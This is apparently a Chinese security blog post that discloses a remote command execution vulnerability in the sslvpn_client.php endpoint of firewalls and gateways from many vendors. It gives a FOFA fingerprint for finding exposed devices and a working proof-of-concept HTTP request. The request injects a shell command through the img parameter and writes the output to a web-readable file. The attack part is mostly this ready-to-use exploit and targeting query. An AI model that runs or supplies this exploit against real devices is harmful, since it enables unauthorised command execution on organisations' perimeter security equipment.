多个安全厂商设备远程命令执行漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞描述

此漏洞存在多个品牌厂商的安全设备中,受影响安全产品如下:

H3C-下一代防火墙

安全信息-明御安全网关

MAIPU-安全网关

D-Link-下一代防火墙

Huawei-产品

迈普通信技术股份有限公司安全网关

博达通信-下一代防火墙

任天行网络安全管理系统/安全审计系统

安博通应用网关

烽火网络安全审计

瑞斯康达科技发展股份有限公司安全路由器

任子行网络安全审计系统

绿盟安全审计系统

深圳市鑫塔科技有限公司第二代防火墙

海康威视安全网关

优炫防火墙

SG-8000深度安全网关

网御星云上网行为管理系统

360上网行为审计系统

二、网络空间搜索引擎测绘

fofa语法

复制代码
body="/webui/images/default/default/alert_close.jpg"

三、漏洞复现

POC

html 复制代码
GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/check.txt|ls HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

然后访问路径 :/sslvpn/check.txt 返回如下则证明漏洞存在

还得是这些安全厂商呀

相关推荐
Whoami!4 小时前
❼⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 在线资源
网络安全·信息安全·漏洞利用
漏洞文库-Web安全7 小时前
【CTF】关于md5总结
安全·web安全·网络安全·ctf·md5
聊天QQ:276998857 小时前
基于51单片机的汽车灯光模拟仿真之旅
网络安全
漏洞文库-Web安全8 小时前
【CTF】buuctf web 详解(持续更新)
安全·web安全·网络安全·ctf·buuctf
AI绘画小331 天前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!
前端·数据库·测试工具·安全·web安全·网络安全·黑客
414a1 天前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程
linux·安全·web安全·网络安全·lingjing·灵境
独行soc2 天前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
骥龙2 天前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用
人工智能·安全·网络安全
世界尽头与你2 天前
Go pprof 调试信息泄露漏洞
安全·网络安全·golang·渗透测试
Whoami!2 天前
❼⁄₂ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 离线资源(上)
网络安全·信息安全·metasploit·searchsploit